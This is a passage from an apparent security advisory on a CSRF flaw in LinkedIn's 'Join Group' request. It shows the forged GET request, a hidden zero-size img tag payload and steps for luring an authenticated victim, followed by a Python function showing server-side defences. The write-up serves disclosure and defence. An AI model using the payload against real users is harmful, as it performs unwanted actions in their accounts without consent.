Next, we show a typical request to the "Join Group" functionality:
POST /nhome/nux/group HTTP/1.1
Host: www.linkedin.com
...
grpId=<groupid>&trk=nux-group-join
Also, the HTTP GET method can be used instead of the HTTP POST method used in
this request, which makes the CSRF vulnerability easier to exploit. So, finally, the following
HTTP request produces the same result as the original HTTP POST request:
GET /nhome/nux/group?grpId=<groupid>&trk=nux-group-join HTTP/1.1
Host: www.linkedin.com
...
1. An attacker creates a web page "csrf-exploit.html" that performs an HTTP
GET request to the "Join Group" functionality.
For example:
...
<img height="0" src="http://www.linkedin.com/nhome/nux/group?grpId=<GROUPID>&trk=nux-group-join" width="0" />
...
2. A user authenticated in LinkedIn visits the "csrf-exploit.html" page
controlled by the attacker.
For example, the attacker sends a message to the victim (the messaging
system provided by LinkedIn is better for this, as it ensures that the victim user is authenticated)
and induces the victim to visit his page (using social engineering techniques).
3. The attacker receives an invitation request from the victim user, so
the attacker just accepts this invitation and the user is added to his group.
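As an added example (not code from the advisory or from LinkedIn), the following Python check shows the server-side defences that close this class of bug for the "Join Group" request above: refuse state changes over GET (which is all an <img src=...> can send), require a per-session synchronizer token that a cross-site page cannot read, and verify the Origin/Referer header. The function and parameter names, the "csrf_token" field and the session-token storage are assumptions.

```python
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlparse

# The application's own origin; a placeholder for whatever site is being defended.
ALLOWED_ORIGIN = "https://www.linkedin.com"


def new_csrf_token() -> str:
    """Issue a fresh random token; the server stores it in the user's session
    and embeds it in the legitimate 'Join Group' form."""
    return secrets.token_urlsafe(32)


def check_join_group_request(method: str, headers: Dict[str, str],
                             form: Dict[str, str], session_token: str) -> Tuple[bool, str]:
    """Decide whether a 'Join Group' request may change state.

    Returns (allowed, reason). Order matters: the cheapest check rejects the
    GET-based attack from the advisory before any token comparison runs.
    """
    # 1. Only POST may change state. The hidden <img> in csrf-exploit.html
    #    issues a GET, so it is rejected here regardless of anything else.
    if method.upper() != "POST":
        return False, "state-changing request must use POST"

    # 2. Synchronizer token: the attacker's page runs on another origin and
    #    cannot read the victim's token, so it cannot forge this field.
    #    compare_digest avoids leaking the token through timing differences.
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid CSRF token"

    # 3. Defence in depth: when the browser sends Origin (or Referer),
    #    it must be our own site. Header names are matched case-insensitively.
    lowered = {k.lower(): v for k, v in headers.items()}
    origin = lowered.get("origin") or lowered.get("referer")
    if origin:
        parsed = urlparse(origin)
        if f"{parsed.scheme}://{parsed.netloc}" != ALLOWED_ORIGIN:
            return False, "cross-site origin"

    if not form.get("grpId"):
        return False, "missing grpId"
    return True, "ok"
```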